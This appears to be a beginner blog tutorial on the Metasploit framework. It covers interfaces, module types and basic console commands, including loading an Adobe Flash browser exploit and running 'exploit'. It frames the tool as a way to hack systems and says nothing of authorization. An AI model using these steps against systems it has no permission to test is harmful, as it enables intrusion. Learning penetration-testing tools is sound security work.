METASPLOIT COURSE

Metasploit For Beginners – #1 – The Basics – Modules, Exploits & Payloads

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Metasploit is the world’s leading exploitation framework. It is used, to some extent, by nearly every hacker/pentester. As such, you really need to become familiar with it if you want to enter and prosper in this burgeoning field.

Metasploit Interfaces

Metasploit has multiple interfaces including;

(1) msfconsole – an interactive command-line like interface
(2) msfcli – a literal Linux command line interface
(3) Armitage – a GUI-based third party application
(4) msfweb – browser based interface

 

Getting Started

Before we start Metasploit, we should start the postgresql database. Metasploit will work without postgresql, but this database enables Metasploit to run faster searches and store the information you collect while scanning and exploiting.

Start the postgresql database before starting Metasploit by typing;

kali > service postgresql start

Once the database has been started, you can  start the Metasploit Framework console by typing;

kali >msfconsole

 Metasploit Keywords

Although Metasploit is a very powerful exploitation framework, just a few keywords can get you started hacking just about any system.

Metasploit has six (6) types of modules;

   (1) exploits

   (2) payloads

   (3) auxiliary

   (4) nops

   (5) post

   (6) encoders

A word about terminology though before we start. In Metasploit terminology, an exploit is a module that takes advantage of a system or application vulnerability. It usually will attempt to place a payload on the system. This payload can be a simple command shell or the all-powerful Meterpreter. In other environments, these payloads might be termed listeners or rootkits. I will do a tutorial on each of these types of modules in the near future.

Let’s take a look at some of those keyword commands. We can get a list of commands by typing help.

msf >  help

 

msf > use

The “use” command loads a module. So, for instance, if I wanted to load the exploit/windows/browser/adobe_flash_avm2 module (this is an exploit that takes advantage of one of the many vulnerabilities in the Adobe Flash plug-in), I would type;

msf > use exploit/windows/browser/adobe_flash_avm2

 

msf > search

As a newcomer to Metasploit, the “search” command might be the most useful. When  Metasploit was small and new, it was relatively easy to find the right module you needed.  Now, with over 3000 modules, finding just the right module can be time-consuming and problematic. Rapid7 added the search function starting with version 4 and it has become a time- and life-saver.

Although you can use the search function to search for keywords, that approach is not always efficient as it will often return a VERY large result set.

To be more specific in your search, you can use the following keywords.

platform – this is the operating system that the module is built for.
type – this is the type of module. These include exploits, nops, payloads, post, encoders and auxiliary
name – if you know the name of the module you can search by its name

The syntax for using search is the keyword followed by a colon and then a value such as;

msf > search type:exploit

For instance, if you were looking for an exploit (type) for Windows (platform) for Abobe Flash, we could type;

msf > search type:exploit platform:windows flash

 

msf > set

This command is use to set options within the module you selected. For instance, if we look above at the show options command, we can see numerous options that must set such as  URIPATH, SVRHOST and SVRPORT. We can set any of these with the set command such as;

msf > set SRVPORT 80

This changes the default SVRPORT (server port) from 8080 to 80.

     

msf > unset

This command, as you might expect, unsets the option that was previously set. Such as;

msf > unset SRVPORT

 

msf > exploit

 

Once we have loaded our exploit and set all the necessary options, the final action  is  “exploit”.  This sends the exploit to the target system and, if successful, installs the payload.

 

Liked it? Take a second to support Alexis on Patreon!
Share this post

Leave a Reply

Your email address will not be published. Required fields are marked *